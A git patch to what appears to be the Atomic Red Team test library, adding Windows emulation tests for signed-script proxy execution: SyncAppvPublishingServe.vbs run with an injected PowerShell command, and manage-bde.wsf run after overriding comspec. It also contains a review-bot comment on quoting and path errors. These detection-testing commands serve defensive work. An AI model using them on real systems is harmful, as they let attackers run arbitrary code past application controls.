From fdd29272852b78f315b784f3bc6d99d272ea35c3 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 14 Nov 2019 15:07:28 -0600 Subject: [PATCH] T1216 Added tests for proxied script execution (#627) * Added script proxy tests * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests * Moving command * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests --- atomics/T1216/T1216.md | 55 +++++++++++++++++++++++++++++ atomics/T1216/T1216.yaml | 42 ++++++++++++++++++++++ atomics/index.md | 4 +++ atomics/index.yaml | 76 ++++++++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 4 +++ 5 files changed, 181 insertions(+) diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index 5e8bd42a..8df9785f 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -10,6 +10,10 @@ There are several other signed scripts that may be used in a similar manner. (Ci - [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass) +- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution) + +- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution) +
@@ -31,4 +35,55 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local +
+
+ +## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution +Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_execute | A PowerShell command to execute. | string | Start-Process calc| + +#### Run it with `command_prompt`! +``` +C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” +``` + + + +
+
+ +## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution +Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe| + +#### Run it with `command_prompt`! +``` +set comspec=#{command_to_execute} +cscript manage-bde.wsf +``` + +#### Commands to Check Prerequisites: +``` + +``` + +#### Cleanup Commands: +``` +set comspec=C:\Windows\System32\cmd.exe +``` +
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 4de8acfa..dc422440 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -21,3 +21,45 @@ atomic_tests: elevation_required: false command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" + +- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: | + Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + + supported_platforms: + - windows + + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + + executor: + name: command_prompt + elevation_required: false + command: | + C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +- name: manage-bde.wsf Signed Script Command Execution + description: | + Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + + supported_platforms: + - windows + + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + + executor: + name: command_prompt + elevation_required: false + prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's + command: | # these are the actaul attack commands, at least one command must be provided + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands + set comspec=C:\Windows\System32\cmd.exe \ No newline at end of file diff --git a/atomics/index.md b/atomics/index.md index e1b2e7c2..1f94994c 100644 
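Review bot: The SyncAppvPublishingServe executor wraps its argument in typographic quotes (U+201C/U+201D) instead of ASCII `"`, so cmd.exe passes them through as literal characters rather than delimiting the argument, and the script name looks truncated — the script shipped in System32 is `SyncAppvPublishingServer.vbs` — so as written the test is likely to fail on file lookup rather than exercise the technique, and any detection content derived from the atomic would key on the wrong file name; confirm the path before merging. The manage-bde test runs `cscript manage-bde.wsf` with no path, which only resolves when the executor's working directory happens to be System32; `cscript C:\Windows\System32\manage-bde.wsf` makes it independent of where the runner is invoked. The `prereq_command`, `command` and `cleanup_command` keys still carry the contributor-template comments (including the typo "actaul"), and the empty `prereq_command: |` is what produces the blank "Commands to Check Prerequisites" block in T1216.md — the template's own comment says to drop the section when there are no prerequisites. `type: Path` for an argument described as "A command to execute" is also at odds with the PowerShell test's `type: string` for the same argument name. The same literals are reproduced in the generated T1216.md and in both index.yaml hunks, so those need regenerating after the fix, and the file currently ends without a trailing newline.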
--- a/atomics/index.md +++ b/atomics/index.md @@ -363,6 +363,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1151 Space after Filename](./T1151/T1151.md) - Atomic Test #1: Space After Filename [macos] @@ -747,6 +749,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - [T1153 Source](./T1153/T1153.md) - Atomic Test #1: Execute Script using Source [macos, linux] - Atomic Test #2: Execute Script using Source Alias [macos, linux] diff --git a/atomics/index.yaml b/atomics/index.yaml index 116f896d..8b5eb01f 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -10664,6 +10664,44 @@ defense-evasion: localhost "script:#{remote_payload}" ' + - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: 'Executes the signed SyncAppvPublishingServe script with options + to execute an arbitrary PowerShell command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + executor: + name: command_prompt + elevation_required: false + command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +' + - name: manage-bde.wsf Signed Script Command Execution + description: 'Executes the signed manage-bde.wsf script with options to execute + an arbitrary command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + executor: + name: command_prompt + elevation_required: false + prereq_command: '' + command: | + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: set comspec=C:\Windows\System32\cmd.exe T1151: technique: x_mitre_data_sources: 
@@ -21091,6 +21129,44 @@ execution: localhost "script:#{remote_payload}" ' + - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: 'Executes the signed SyncAppvPublishingServe script with options + to execute an arbitrary PowerShell command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + executor: + name: command_prompt + elevation_required: false + command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +' + - name: manage-bde.wsf Signed Script Command Execution + description: 'Executes the signed manage-bde.wsf script with options to execute + an arbitrary command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + executor: + name: command_prompt + elevation_required: false + prereq_command: '' + command: | + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: set comspec=C:\Windows\System32\cmd.exe T1153: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a4a50715..2182952e 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -151,6 +151,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1099 Timestomp](./T1099/T1099.md) 
@@ -609,6 +611,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]